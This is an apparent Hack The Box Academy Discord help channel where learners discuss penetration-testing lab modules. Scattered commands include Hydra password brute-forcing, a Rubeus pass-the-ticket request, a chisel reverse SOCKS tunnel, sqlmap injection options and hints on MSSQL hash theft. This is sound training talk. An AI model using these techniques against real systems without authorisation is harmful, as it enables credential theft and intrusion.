#modules
alongside visiting the webpage of those cases gives you a basic hint of what to do
but you'd need to do some messing around in order to find where to start
while yes, sqlmap is an automation tool, to an extent, you still have to somewhat mess around in order to tell it where to start from -- then you can get it to do whatever you need to
Unfortunately this is the majority of the game we are in.
Banging your head against the wall a good portion of the time is part of it.
Learning how to drown gracefully is a big part of hacking.
Also, OffSec is a LOT worse with this kind of thing XD
If you pay for an annual subscription, you get the walkthroughs 😉
Also, can somebody give me a hint as to how to exfil the username portion from the nosql module on the CWEE?
If you can't do that, please tell me whether I'm supposed to be getting it from the /login or /forgot endpoint XD
I do pay for the annual subscription but walkthrough also does not go over the why, only this is how you do it. The course goes over the prefix and suffix usage, and even gives an example with the server side php code. But I'm struggling to see how I would have ever figured out the answer without having access to the php code. I'm not interested in just accepting the fact that I can run a script with provided parameters and get the answer, I want to know why I'm putting in the values and how to obtain them
ChatGPT...?
Or sqlmap -h
But honestly bro, you're probably never going to use SQLMap much anyway.
Not unless you are testing an app outside of production.
I'm not doing a pentest, I'm going through the course. This shouldn't be such a mystery
I feel you man, truly I do.
But let me tell ya, this is just the beginning.
It only gets worse.
A lot worse.
the walkthrough doesn't explain anything in any of the modules; it's why i suggest not using it
the walkthrough is assuming you read the content and have a grasp on any of the fundamentals related, and just move forward with that assumption
Exactly why I am here and not just moving on
So can you confirm that there is just no way that I would have been able to answer this without simply knowing common prefixes or did I actually miss something?
the module expects you to check the manpage, like every other person
How very helpful
if you're supposed to look at man pages or documentation then the expectation is that you do that
....except --prefix is literally not even on the manpage or -h
under Injection buddy
```text
Injection:
These options can be used to specify which parameters to test for,
provide custom injection payloads and optional tampering scripts
-p TESTPARAMETER Testable parameter(s)
--dbms=DBMS Force back-end DBMS to provided value
```
where exactly?
```text
These options can be used to specify which parameters to test for,
provide custom injection payloads and optional tampering scripts
-p TESTPARAMETER Testable parameter(s)
--skip=SKIP Skip testing for given parameter(s)
--skip-static Skip testing parameters that not appear to be dynamic
--param-exclude=.. Regexp to exclude parameters from testing (e.g. "ses")
--param-filter=P.. Select testable parameter(s) by place (e.g. "POST")
--dbms=DBMS Force back-end DBMS to provided value
--dbms-cred=DBMS.. DBMS authentication credentials (user:password)
--os=OS Force back-end DBMS operating system to provided value
--invalid-bignum Use big numbers for invalidating values
--invalid-logical Use logical operations for invalidating values
--invalid-string Use random strings for invalidating values
--no-cast Turn off payload casting mechanism
--no-escape Turn off string escaping mechanism
--prefix=PREFIX Injection payload prefix string
--suffix=SUFFIX Injection payload suffix string
--tamper=TAMPER Use given script(s) for tampering injection data
```
Well, that's not the output in Parrot OS
Also not exactly sure how that helps me in this situation
Ah, needs a -hh
Ok, so again, how does this help me?
idk
Awesome, I revert to my initial comment "How very helpful"
get good
how do i leave a review on a module? can't find the option to
You're giving me such great advice I'll be there in no time. Thanks buddy
Maybe next time you could say check the advanced help menu instead of the manpage? Because the manpage still doesn't have the option
to be fair, they do go over prefix/suffix in the section, it's the first thing covered even if you didn't look at the advanced help menu. that said, to answer your question how would you know to use that prefix, selecting the correct prefix depends on the structure of the original sql query. it may need manual testing/guessing as to how it's structured or by experience or by guessing based off how you think the query is being sent.
you have to think of how the query is being sent and what it's looking up etc, which is why it's important to know what kind of db you're attacking, what kind of query it's making where you make your injection, etc.
Thanks, that's all I needed to know
Well, I guess I would also like to know if there is something I missed that would clue me in to what query is actually being run but from what has been said so far it sounds like that is not available
i did speak to that
inject basic characters manually and observe how the application reacts, error messages can reveal info, just simply by trying different prefixes, etc
Ok, so as asked above, is there some place to leave feedback? In my opinion this is more of a skills assessment question than part of the course leading up to the skills assessment. This section should go over the common prefixes and suffixes and should include the prefix needed to answer the question
it's covered in the previous module in the path, sql injection fundamentals
if you feel there are changes that should be made i think you can post it in #1234357888114364508
I'm doing the Basic Toolset path at the moment. SQL Injection Fundamentals is not part of the Basic Toolset
most likely because if you're using sqlmap they probably assume you have the fundamentals down, like how the queries are structured
that's just a guess though
That's fair enough, and would make sense. I think the Basic Toolset needs an update if that is the case though
Or maybe I didn't understand the purpose of the Basic Toolset when I selected it. I was under the impression it was the best place to start
Introduction to Bash Scripting / Working Components / Comparison Operators : for the last question, can someone please explain why $(var: -20) does not work to get the last 20 characters but tail -c 20 does? thanks
i don't think that's valid syntax
tail -c simply uses an external command to do the same thing
yea which is why im confused
tail -c counts bytes
with the brackets?
still, why is tail -c 20 giving 19, whereas var: -20 is giving 20?
oh no im sorry typo in my message
had it right in the script tho haha
{var: -20}
because tail -c counts bytes
so? why is that changing output here
i get the first is a substring
but why does it matter if its counting bytes?
because characters are not always 1 byte each
ahh
so -c is grabbing the last 20 bytes
whereas -20 is grabbing the last 20 characters
yes
does anyone know of a tool that can attempt AXFR recursively? Like if it initially found dev.domain.com via AXFR it will try AXFR with dev.domain.com to find internal.dev.domain.com and so on? From what I searched online it seems there are only scripts
I wish I had an answer for you but the best answer would be bash scripting
yeah, seems like it, I am surprised though, as this seems like a common thing to try
my pwnbox is broken. can't spawn it. tried refreshing, clearing cache, changing browsers. Nothing worked. can i get some help?
are you using EU region?
nothing spawns
i mean are you using HTB EU servers?
they have been having issues, if so, try US region
servers as in here right?
im getting an error message each time saying something went wrong
please try again later
It’s the one above it
@tulip copper please don't post stuff that may spoil a skill assessment, also please don't post screen shots/commands of content above tier 0.
Where can I post my command and get help with why it doesnt work?
your command does work
I mean I didn't get the intended result I guess
i'll dm you
Is this the right place to ask about my doubts?
This channel is for discussion of the various modules on HTB's Academy platform
Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible
@harsh sandal (1201660294720667738) has been warned with a strike weight of 0.
no, this server isn't about that
Anyone else gets broken targets? Frustrating when I spent over an hour on exercise and thinking I made a mistake, then suddenly target became unresponsive so I reset to another target. On another target the exercise worked right away and turns out I didn't even make a mistake.
This server is for discussion of HackTheBox's platforms, not doing illegal things.
Hello
I rarely encountered broken targets. Sure, sometimes it can happen, but it was rare for me. I found I was usually doing something wrong. Also, sometimes the exploits may not work just like in real life, until like a reboot happens or something.
Can you help me please
with what
HTB
Note added.
You can ask about modules from Academy here, or other things in other channels
Sure, it was the first time this kind of thing happened to me so I was wondering if it is a frequent problem. This time it was clearly a broken target since I did exactly the same thing once I've reset it and it worked perfectly! Just very frustrating because I spent some time and I thought I was doing something wrong
Well, the thing I need hacked is for a reason
Anyways, I've now managed to finish the XSS module which was a lot of fun. Anyone suggest what module to do next?
Doesn't matter, not the place for this. Contact the authorities if you think something illegal happened. No one is going to commit felonies for you like hacking youtube.
Not YouTube just a channel and that’s it I don’t want to hack the app
Contact youtube.
SuperNut what's your favorite module?
I liked Active Directory Certificate Services
That's the Windows, yeah? I noticed there are tons of AD modules, haven't done any yet.
yeah it's windows focused. i like a lot of modules though.
user behavior forensics was cool i thought
Sounds cool! I've really enjoyed the web app modules and learning tools like nmap and metasploit. I'm addicted to learning all from HTB 😄
Did you get a job in the field by learning from HTB?
no haha i'm old and got into IT a long time ago
Nice! I work in a different field than IT but at least it's a super fun hobby for me
Hi everyone,
is there a problem with HTB Academy VMs because I can't open a VM since yesterday
Yes, EU server right? I had the same problem. Change your VPN to US
What is the difference between the two learning progress figures mentioned above?
hi guys, i am having problems with the end-of-chapter exercise: when i scroll all the way down the page, instead of seeing the exercise i get shown the javascript code of the page
refresh the page?
Send the decimal representation of the subnet mask of the following CIDR: 10.200.20.0/27. What is the answer, friend?
Hello
convert the first 27 bits into 4 octets, then turn those into decimal
discord was created to ask and answer all related questions in a connected room, not for showing off and being pretentious. don't be afraid of problems to answer or of what we know; help people, to broaden your horizons and your intelligence, as well as your abilities. basically, discord is just a connector, and has no right to dictate or judge someone, ok.... if you believe in AI or robots, and submit to them, BULLSHIT, bullshit....ok
ask
regarding your question. post it in #1024429874246590575
This is for modules related stuff only. Anything else will just be nuked
Anyone got any ideas on why a lab machine keeps disconnecting?
Module: Active Directory Enumeration & Attacks - DC Sync Attacks
I had no issues with previous module last night,
I have tried changing VPN servers, using my host machine rather than my VM, rebooting the VM,
I have occasionally had it connect and then the box just freezes and kills the connection
thanks @novel matrix I should have mentioned I'm using US servers because of that
then yeah I would recommend reaching out to us via the green chat bubble
I tried that and as I need content guidance it ends my conversation
oh they're back tomorrow
Anyone using Hydra, could you please guide.
hydra is not detecting correct password, it's my DB server. I just checked if hydra can detect that and it didn't.
MSSQL DB server running on Azure, uses SQL authentication
Tier: General Purpose - Serverless: Gen5
tsql -H myfreeserver-xx-redacted-xx.database.windows.net -p 1433 -U demouser -D myFreeDB
// This worked and I am able to login after entering password
At the same time I checked if
hydra -l "demouser" -p "password123" -s 1433 myfreeserver-xx-redacted-xx.database.windows.net mssql -m "DatabaseName=myFreeDB" -V
I can see it is trying the password, still the cred is not identified as correct one.
1 of 1 target completed, 0 valid password found.
Tried on Hydra version v9.2 and 9.5
Hello, i need some help with Pass the Ticket in Password Attacks module.
It says that this command is indeed performing Pass the Ticket:
c:\tools> Rubeus.exe asktgt /domain:<domain> /user:plaintext /rc4:<hash> /ptt
How does using only the hash get us a full PtT attack? If the hash was enough, what's the plus in using the .kirbi file? Is it something about how the /ptt and asktgt flags work? I see in the output of this command that it is importing the base64 ticket. So I'm a little bit confused.
I want to understand the attacks and cause really well.
Thanks in advance !
hello, is there anyone working on Exploiting Web Vulnerabilities in Thick-Client Applications?
Hey, has somebody here done the ADCS attacks module? Stuck on the last question of the skill assessment
hey
why not try other tools.
nmap, medusa, maybe impacket
just use other tools for pwnbox/parrot
mssqlclient.py from impacket. i think some commands are not working in it
read the install file
pwnbox didnt have sqsh
it should work
could it depend on what authenticating system you use windows-auth or the other one
in Attacking Common Services, in the section Attacking SQL Databases, i cannot use the creds i bruteforced for mssqlsvc for the question "Enumerate the "flagDB" database and submit a flag as your answer", and cannot do privesc. the account i logged in with is unusable; i cannot even list all the databases
Stealing hashes is the intended method
But everything is done within the sql prompts
yeah stole the hash and cracked it now what ???
Log in with it
thats the part i am unable to think of
Is the contents of the module "Introduction to Windows Command Line" up-to-date? I could not find the waldo.txt in cmd even after using the side-by-side solution. I found the file in a specific directory by using Windows Explorer. At that time the OS popped a message box saying "You don't currently have ..." and after clicking the ok button on it I could find the file in cmd with very same command which I used at first. I wonder if I forgot something in the module or previous ones, or the module is kind of outdated.
i cannot login with those creds
To the sql db?
Did you add -windows-auth?
Run cmd/powershell as admin
it worked thanks @fathom pendant
👍
Thank you for your advice. I made sure that I can run cmd as an admin and find the file. I will try to run anything as admin if possible.
Hey. Can anyone give me a clue on the attack path in DACLs II - skill assessment question 3? I got the NT hash of the ||TANGUI|| user but I can't find any good ACL rights with this user
||checked gpo rights?||
Yes, with impacket-dacledit it doesn't show anything. I checked GPO and also files on the DC share
nothing to do with htb academy modules @finite abyss i suggest asking in another more relevant channel
I need to type that again
well this channel is for help with academy modules; not personal/self projects
did you figure this out? I too keep getting this error message even though i have the pass and user found in the smb client and according to write-ups it is correct
run as admin
You should have creds for a user that can create them and the user you have can link
Yes I did it for the 2 question. But the third one is to compromise DC
Good afternoon guys, has someone completed the AI module?
Thank you i tried that already but doubling back i got it
Check again who can link gpos where
22 and 23 maintenance i have now
In the sliver module, has anyone else come across repeated "rpc error: code = Unknown desc = implant timeout" errors?
it's starting to be really frustrating, even when I set the timeout higher, it rarely works
How am I supposed to get wills password in Module "Credential Hunting in Linux", without the hint? Is it even possible?
ey guys i need help with this please. I've been stuck for 3 weeks
i don't know how to program this
Good afternoon, I'm new, I wanted to know what module do you recommend to start?
Intro to academy after linux fundamentals after windows fundamentals
🙂
Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible
I only have Windows, would I start with the basics of Windows?
if you can better linux fundamentals 🙂
okay, thank you very much
you're welcome
@unreal tartan Windows shouldn't stop you, you can either use a Virtual Machine running windows (most recommended), or use Windows Subsystem for Linux (WSL2) to run tools only available under Linux
I daily drive Windows, and only rarely do bounty or modules, but am more than able to, using WSL2. The reason a Virtual Machine is the best option is that it keeps everything separate from your Host machine (Windows)
hey yall, quick question, on the htb academy lessons, do i need to use pwnboxos in order to complete them or can i just use my own stuff as I'd be more comfortable and it'd benefit me more to become more fluent in my own stuff
in shells and payloads, final challenge... the first host's hint provided username and password... How to obtain those username and password without the hint? is it brute?
Depends Mary I use pwnbox and my own box.
true but im also running on the free version of the academy and i only get one spawn
on CBBH modules most of the time I use my own box, but currently doing CPTS modules I keep using Pwnbox for faster result.
imma just play chicken with this train and if i need to move out of the way, then so be it
You can use your own box perfectly fine
killer 😄
The only differences are that the Pwnbox connects automatically, and that it includes all (or if not the majority of) the tooling used in the modules 🙂
I know it's the wrong chat, but where can I find some materials on how to make an HTB machine to submit it? I mean how to make the setup, VirtualBox ISO, set up flags, etc.
They may not cover everything, but they contain good advice.
np!
Guys, I have done this in the curl question and I am getting 50 as the answer.
cat inl.txt | grep -o 'https://www.inlanefreight.com/' | wc -l
Now I need to get the path after the / and eliminate the duplicates. The answer is supposed to be 33 or 34 but I don't know exactly what to do. I have tried uniq and sort -u but then it gets down to 1. Can someone help with what to search next?
ey guys, has no one completed the AI module yet?
some people are suggesting to use regex on reddit but it's in the next module
combine the python3 code from the previous sections and you will be able to create the model anonmous7
isn't there any way to extract the answer with sort, grep?
I went through their man pages and all but so far haven't been able to get ahead
but how bro
Yeeees thank you I got it!
can anyone please help with this, I have been stuck here for hours now and cant get anywhere
guys I'm going to dinner good night all
anyone know if theres a path or module setting for the ccna?
No one here can help you with that. This discord is about HackTheBox and their various platforms.
im asking about hack the box
i asked if there was a path or module to follow lol?
tried searching but to no avail
Ok, do you have an idea where someone could help me? The 'OpenSecurity' server is only accessible with an invitation link.
I was replying to AbyssWatcher not you
No I don't
Ok, but thank you
I don't know of any HTB training on CCNA. They have a few basic networking modules, but CCNA focuses on Cisco equipment, which I haven't seen on HTB at all. I haven't really seen them focus on any specific vendor equipment.
you can use your own system for 99.9999% of academy the 0.0001% is when it specifies pwnbox
run commands one at a time; before the wc -l command see what the output of your grep command is
yeah i have networking foundations, traffic analysis, pivoting tunneling and port on the list
i guess ill just do those ones next and follow the relative paths see where i end up
just trying to top bottom, so i can bottom up
Is there a way to get support from Hack the Box employees?
My problem is that the automated submission of ISC2 CPEs is not working despite having it all connected in the past and an active VIP subscription?
Cheers 👍
how to list tables in a database in mssql
the query they used in the section is not working
best to say which module/section you're on
attacking common services section attacking sql databases
i used sqlcmd and it worked great
i would recommend a VM that way you have access to windows and kali at the same time
or parrot or whatever
ok
i think sqsh also worked for me
there's another tool too it mentions from impacket you can try
sqsh is hard to install
i don't get how to compile it
some environment variable, sybase or something like this, needs to be exported
what OS are you using?
parrot
ahh. i use kali, i think it just comes built in with kali.
you could see if it's on the pwnbox
you can try the impacket tool too
no i checked it is not present in pwnbox
it is not working i mean the query to display all the tables is not working via mssqlclient.py
Parrot OS
Download libreadline7_7.0-5_amd64.deb
http://ftp.de.debian.org/debian/pool/main/r/readline/libreadline7_7.0-5_amd64.deb
Download sqsh_2.5.16.1-2_amd64.deb
http://ftp.ch.debian.org/debian/pool/main/s/sqsh/sqsh_2.5.16.1-2_amd64.deb
First install libreadline7 by double-clicking on the file.
Then install sqsh with a double-click.
Sick!
If you’ve finished the footprinting lab-medium then you can refer to how you solve the questions in that module
It’s almost the same as the mysql, you just need to change one word
check github for a clone
Hello guys!
I am doing the Attacking WPA/WPA2 Wi-Fi Networks - Skills Assessment
Getting some tls error certificates:
wlan1: STA ba:56:b5:74:a0:51 IEEE 802.1X: Supplicant used different EAP type: 13 (TLS)
wlan1: STA ba:56:b5:74:a0:51 IEEE 802.11: deauthenticated due to local deauth request
I patched the eap_server_tls.c file to accept the certificate, but even after that I am still getting the certificate error from the client.
Someone could help?
hi all, quick one on Linux Priv Esc - Escaping Restricted Shells. I have the flag but have been playing around with different ways; the restriction of '/' makes it harder, but I just want clarification: is there only one intended method, as the question says using 'different approaches'? many thanks
hello, did you need something
Yo
Yo that's my last challenge on this module, but this thing is just not working.
Even after patching the file
PSWA in the Windows Lateral Movement Skills Assessment is returning ERR_SSL_KEY_USAGE_INCOMPATIBLE when I attempt to access it from Chrome on the machine I'm running Parrot on bare metal from. Any ideas?
Never mind, works fine from Firefox.
Hello, I'm not sure if it's the right channel, but let me know if not so I can delete my message.
Are there any courses on HTB Academy related to cloud (either offensive or defensive modules)?
no there aren't
Thanks. Do you recommend a platform to learn about that topic?
i haven't checked it out too much myself, but i hear pwnedlabs.io is popular
Thanks!
I think it has Azure, AWS, and Google Cloud Red teaming stuff
which sounds very useful
yeah i think some blue stuff too
ya they just gotta add Oracle and IBM red teaming
between that there's most of the cloud services among Silicon Valley companies and government organizations
that would get you red teaming skills for more than 90% of Silicon Valley, more than 90% of government organizations, and more than 90% of fortune 500 companies
and the hacking skills would be usable with all of that
wow lmao
lolll
im not entirely sure if you guys had the same results but
something wrong with that target url perhaps
Team, I was working on Pentesting > Information Gathering > Virtual hosts
Here, the solution that has been provided is not working.
I tried all possible methods but still it remains stuck.
Can someone help here from #modules team ?
What exactly are you having issues with?
I am performing vhost enumeration and with that the wordlist mentioned is exactly what I used, but I am not getting the expected output to answer the questions.
I have copy-pasted the exact command, changing only the IP to my target machine's.
Did you change the port?
Change the 81 from the command to the targets port and it should work
Certainly. I just figured out the DNS resolution part; I messed up with the wrong IP.
Sorry for creating trouble. Thanks @signal rain
No trouble was caused, I had issues when I did that module as well. Good luck boss
Thanks
hey has anyone done the token defensive module on academy
Im just asking if anyone did it and would like to share what you thought about it
On the medium assessment for the Attacking Common Services module, I tried scanning common ports 1-1028 and found some stuff open. That was ok, but nothing that was open was usable to access the server like the lab is telling me to do. I tried scanning all ports with -p- but it didn't work either because my pings were being blocked. Then I tried again with -Pn and it really didn't work at all, because this was the output:
```text
Nmap scan report for 10.129.128.59
Host is up (3.2s latency).
All 65535 scanned ports on 10.129.128.59 are in ignored states.
Not shown: 63203 filtered tcp ports (no-response), 2332 filtered tcp ports (host-unreach)
Nmap done: 1 IP address (1 host up) scanned in 2384.96 seconds
```
So now I'm trying an idle scan which probably won't work but I don't know what else to try.
Should I just start a new target?
and try the sudo nmap -Pn -p- ip-address again?
I also tried a connect scan because idle scan stopped vpn from working like I couldn't make it work
I tried using google as the zombie
but I felt like that was going in a bad direction so I switched from -sI to -sT
gonna try it again if this scan in different vpn config file won't work
@quasi wave if you are given a port number, stick to the port number
Oh, VPN
NVM
My bad, thought it was a docker instance 🙂
no
Yeah, I see that now, tired eyes.
I found when scanning common ports that DNS, SMTP, and POP3 are open a while ago. But hydra, medusa, and smtp-user-enum aren't getting anything. Port 22 is also open but I can't get a specific SSH username to crack the password of.
I even tried using hydra with same password and different screennames to try and enumerate SSH usernames
and none of this will work so I need to try every possible port
```text
Nmap scan report for 10.129.128.59
Host is up.
Skipping host 10.129.128.59 due to host timeout
Nmap done: 1 IP address (1 host up) scanned in 900.40 seconds
```
so -sT is not working either
can someone help me out with this?
I literally tried everything I even tried attacking FTP which was the only other thing that I think might have been open.
Are the ports you found earlier still open?
Let's go to DM.. I don't do this often.. but I'll see if I can nudge
Introduction to Malware Analysis - Debugging
Following the module and replicating it step by step. However, each time I run the binary in x64dbg, the sandbox detection box always pops up. I've changed all addresses. Anyone available for DM?
go for it
@naive sage so yea...I get back my b64 string after decoding..and..well..that's it
You got the b64? decode it to clear-text, you got the answer.
I did..but it was a previous answer
:/ apparently @naive sage it was a typo in the 1337 so a c/p did what typing it didn't...who knows..
🤣
You got the answer tho?
yeah copy/pasting is almost always gonna be superior lol
sometimes it adds spaces that I have to remove to condense the htb{} though
it'll be like htb {c oddddddddde }
that's a skill issue
you can just condense it down with some simple functions or just not have skill issue 🙏
i've not had any issues though with spaces in the middle of the code
might be c/p between vm and metal
unless you're referring to where it crafts the flag with 'str'+'str'+'str'
i've not had that issue
like...ever
hey guys how long do i gotta wait for that pin to crack g
Login Brute Forcing
never mindddddd
got it
Hello everyone
I face an error with wordpress module in skill assessment
I can't access the target. It just gives me an IP after firing up the machine, and when I scan it with wpscan it tells me this site does not run WordPress. I try to access the blog subdomain but I can't due to a DNS problem, so how can I fix this problem?
Take a look at the source code of the website.
If DNS is a problem, then a known file on the PC could help you
Thanks, I just added the IP and the subdomain into my hosts file, the problem is solved
that's why it could be good to start with the fundamental courses. Although sometimes the wording of the supposed answers is a bit annoying
There are several modules, File Upload Attacks & File Inclusion, that do not show parts of code. I tried several browsers with extensions and not and reloaded the page with CTRL+SHIFT+R
Hello, I'm stuck on: https://academy.hackthebox.com/module/51/section/1592 "Environment Enumeration",
I successfully got a root shell but when I enter the flag, it's not the correct answer. As root, I perform the command: find / -type f -name "flag.txt" but I see only the wrong flag on the machine
Make sure there are no spaces at front/back
Already checked that. Still not working
the flag is not in a flag.txt file, re-read the question. You may be jumping steps too, I don't remember but I'm not sure you need to actually escalate to root for the answer
Oh okay
hey guys, I'm in the Pivoting, Tunneling, and Port Forwarding module, in the RDP and SOCKS Tunneling with SocksOverRDP section. I have RDP'd into the second machine but seem to be having an issue running socksoverrdp-server.exe: I try to run it and nothing happens. Any thoughts as to why this is happening?
Hello guys. Can you please give me good cheat sheets for web exploitation topics such as SQLi, XSS, LFI, etc.? Every cheat sheet is either large and full of unneeded info or only commands/payloads
XSS -> https://portswigger.net/web-security/cross-site-scripting/cheat-sheet
SQLi -> https://portswigger.net/web-security/sql-injection/cheat-sheet
What designation do we typically give a report when it is first delivered to a client for a chance to review and comment? (One word) Can anyone give me the answer?
the simplest answer is the right one buddy
Anytime to do with MySQL 5.7.23
can you plz tell me the answer
Which module is this question from?
penetration testing process
guys hello, what should the correct syntax be for finding details about a local group in windows, for example backup operators?
for the command net localgroup backup operators it gives me an error, but the command net localgroup administrators gives information. It seems I am using the wrong syntax?!
Are you wrapping "Backup Operators" in quotes?
no and I should?
oh it's Penetration Testing Process
For any of them that are more than one word with a space between.
Thank you it worked))))
Maybe this one?
Introduction to Penetration Testing
no
What is the name of the module and what is the name of the section?
Penetration Testing Process ,Post-Engagement(section)
Read the chapter „Deliverable Acceptance“ again
thanks @acoustic owl
What is the name of the security standard for credit card payments that a company must adhere to? (Answer Format: acronym) hey @acoustic owl, can you give me the answer?
Read the module again. The answer is in the text
is it PCI DSS
usually helps if you provide some output
isn't that prohibited by the rules here?
well, what if it is just an error msg?
no, it is not an error message. The command provided in the module is not working on the target machine.... and I am interested why?!
Is Hack The Box openvpn down right now?
I can't get on Enterprise, Labs or on Academy
well, how is it not working if it doesn't give an error message?
idk, it's not even accepting on my VM or host machine
Anyone familiar with the 'Windows Privilege Escalation' module? I have been stuck for 3 days.. hmmmm
hint: Look up default privileges for windows
and select the one that isn't a default account priv
you mean by using the whoami /all cmd?
hello guys, I need help with web enumeration. I don't understand what the answer is because I can't find the robots.txt file. Can you guys help me with it?
anyone, help me.. Please
Open an elevated PS session then run your command. I'm pretty sure I mentioned this the other day.
elevated PS session?
You can DM if you don't understand what I mean.
I already use PowerShell as admin, also cmd.
anyone help me too?
strange, even with the client on my host and a fresh VMware image it still isn't working
The only thing I haven't done at this point is pick a different server
have you looked at the standard path for it?
Good morning everybody, hope you're doing great. I need some help getting root access on the Ubuntu 20.04.1 box in the Penetration Tester pathway, Privilege Escalation module. Here is some information. Has anyone completed this module? I need some help with it please. What kind of exploit should I use? I have tried Dirtycow (cowroot), but it's not compatible with the target. Any idea might help
Remember if you've identified new subdomains to start your enumeration process over again for them.
Hi there, looking for help with "Working with IDS/IPS" module, i'm stuck at "Suricata Rule Development Part 2 (Encrypted Traffic)" section.
The question : There is a file named trickbot.pcap in the /home/htb-student/pcaps directory, which contains network traffic related to a certain variation of the Trickbot malware. Enter the precise string that should be specified in the content keyword of the rule with sid 100299 within the local.rules file so that an alert is triggered as your answer.
I started by looking at the local.rules file, and "content" is empty there, so from what I understood I should look through trickbot.pcap. My problem is that I'm quite lost on how I should do this. I don't have tshark available
Is anyone else having issues connecting to their Open VPN on Hack The Box?
I scanned everything; there are multiple IPs, servers, ports etc., but I didn't understand which one I have to try for robots.txt for private
use the strings tool
Check the local.rules file to confirm that the rule with sid: 100299 is missing the content field. Use: cat /etc/suricata/rules/local.rules | grep 100299
Open the trickbot.pcap file using tcpdump
tcpdump -nnr /home/htb-student/pcaps/trickbot.pcap | less
im connected. had to redownload the file
So weird, I redownloaded the file as well, and switched the server
guys, do you know what the issue is in my problem? can you help me
It wasn't a file issue but I figured it out
It was a problem on HackTheBoxes side
Navigating to http://10.10.10.121/private in a browser reveals a HTB admin login page.
I do this but it's not working
It's so embarrassing
please help...
if you want to increase your chances of getting assistance, put the module name and section name that you're working on as well as what you have tried
I tried to use both tcpdump and strings as suggested, but yeah, still stuck. I'm expecting to find a hex string, but I'm probably looking for the wrong thing here
nevermind... I just have reading issues.
I completely missed the point of ja3, I solved it now
complicated ahhhh
there is no walkthrough for the Windows Privilege Escalation module.. I'm starting to give up and will stop the enrollment soon.. .
😂
anyone managed to solve the T2 Server Side: Skills Assessment?
I solved it, but I'm looking for the intended solution
Module: Footprinting Lab - Hard
I was doing this lab, so I tried UDP ports, but it didn't give me anything. Then I ran it again and got an SNMP port. After that I tried connecting, but it was showing a timeout. Then I brute-forced community strings; it didn't return anything. Then I did it again and it returned backup. Then I tried to snmpwalk it and it says:
Timeout: No Response from 10.129.15.81
So the concerning thing is that even when I tried from Pwnbox, the same false positives are happening. Any experience with this problem? What should I do? I'm scared that it might happen again in the future and potentially waste hours, and it may happen even in the exam, so what should I do?
Use cURL from your Pwnbox (not the target machine) to obtain the source code of the "https://www.inlanefreight.com" website and filter all unique paths ("https://www.inlanefreight.com/directory" or "/another/directory") of that domain. Submit the number of these paths as the answer.
I am stuck, help.
I understand that I need grep -o combined with sort -u to uniquely list the paths, and wc -l for the count, but I am struggling with the regex and the stripping etc.
Gimme a sec
Okay, you're on the right track; you'll need to use sed to validate the regex correctly
Should help you out
although you are not supposed to grep for that
you need to chain the tools you have learned so far
Hello, I am trying to complete this task: "Transfer Julio's ccache file from LINUX01 to your attack host. Follow the example to use chisel and proxychains to connect via evil-winrm from your attack host to MS01 and DC01. Mark DONE when finished." But I am stuck at connecting back to DC01
I have managed to transfer the ccache file required for Julio, and here is the command I used for setting up the chisel server:
sudo ./chisel server --socks5 --reverse
2025/02/24 19:29:39 server: Reverse tunnelling enabled
2025/02/24 19:29:39 server: Fingerprint h8S0dGz7u8bocnrew+nEOQky8Qupv3illaJTM3f+Z9g=
2025/02/24 19:29:39 server: Listening on http://0.0.0.0:8080
2025/02/24 19:30:14 server: session#1: tun: proxy#R:127.0.0.1:1080=>socks: Listening
I am on the File System module. I followed the content and I cannot figure out the correct answer; my answer is "NT AUTHORITY\SYSTEM". Any advice?
The question is: What system user has full control over the c:\users directory?
I ran the following command
icacls c:\users
the output was as follows:
NT AUTHORITY\SYSTEM:(OI)(CI)(F)
NT AUTHORITY\SYSTEM:(OI)(CI)(F)
BUILTIN\Administrators:(OI)(CI)(F)
Anyone finished the Intro to Deserialization skills assessment 2? I'm struggling to get RCE. I can only get a 500 error or a redirect to localhost. I think I'm unable to bypass a filter.
here is my krb5 config for reference:
cat /etc/krb5.conf
[libdefaults]
default_realm = INLANEFREIGHT.HTB
[realms]
INLANEFREIGHT.HTB = {
kdc = dc01.inlanefreight.htb
look at where proxychains is trying to route to, it's routing to a public router -- not to the DC; you need to add all subnames of DC01 to your /etc/hosts file
Hello, maybe someone could help me with this question?
Using the skills acquired in this and previous sections, access the target host and search for the file named 'waldo.txt'. Submit the flag found within the file.
also, the question states to use evil-winrm to connect
not psexec
also: this module is above T0, so avoid spoiling
I'm assuming for proxychains you used ssh -D to connect to the initial host
or some other pivot method
ligolo-ng avoids the whole proxychains nonsense
@novel parrot If you assign several IPs to a domain, this is guaranteed to cause problems
evil-winrm doesn't work for me:
try cleaning up your hosts file first only leaving the lines relevant to your current task
That's kind of AWKward
...I'll see myself out 🚪 🚶
@signal hound Password Attacks is above T0; avoid spoiling things like usernames and files you need to dig for
that file is the last step
How am I supposed to get it though?
I tried every way I know
you should be able to via smb;
I suggest restarting the machine, waiting a minute, and trying again
Ok thanks
sorry if this is a silly question, but what does a flag look like? I'm at this question and using tcpdump to intercept data while I use nc on each port, but I'm not really sure what I'm looking for
unless I'm in the wrong spot; this is what my output is looking like, so I could just be doing it wrong lol
why not use nmap to get ports
also, the module and section name is SUPER helpful
you're likely overthinking the problem
module and section name
that's helpful to have others help you
Network Enumeration with Nmap | Service Enumeration
you're overthinking the problem
silly thing @novel parrot, try with sudo
@rain saffron that module is above T0, so removing spoilers
one of the ports seems out of place
no luck, I'm still getting a timeout
the flag format will be HTB{50m3_5tr1n6}
so this was actually pretty clever
you only need to use nmap for this exercise
be mindful when you receive a response from a server you may find a status code like 220
Hi
actually the hint says "NMAP may not recognize all information by default"
pushing you to think a bit outside the box
though I'm sure with a specific script type it'd work
the section also shows using nc and tcpdump
nice phonon pic
hey sorry for the tag, but was your podcast recorded, will it get published to spotify like the others ?
it'll be posted probably around May
thanks, are you a fellow Under Night enjoyer? lol
I was hoping to listen to it before my attempt, oh well
I just happen to know the characters. I play other FGs
ah ok nice, UNI was my first non-plat FG, so I still play her from time to time. My friend group doesn't really play much UNI, so most of my time with FGs is on +R and MBAACC
nice
Can anyone help with this one? Web Attacks, with ffuf
" In addition to the directory we found above, there is another directory that can be found. What is it?"
I'm getting only errors
are you using the spawned target?
Yes
I rebooted my Kali
And spawned a new target still nothing
So I'm thinking I'm doing it wrong at this point
ffuf -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt -u 'http://83.136.255.243:52747/FUZZ'
Thanks it worked
I got the password, how do i interact with the file now To decrypt it and see the contents of it?
so -mc 200 and use directory-list-2.3-big?
did you think to ask your friend?
read the server description
Ok
Hey
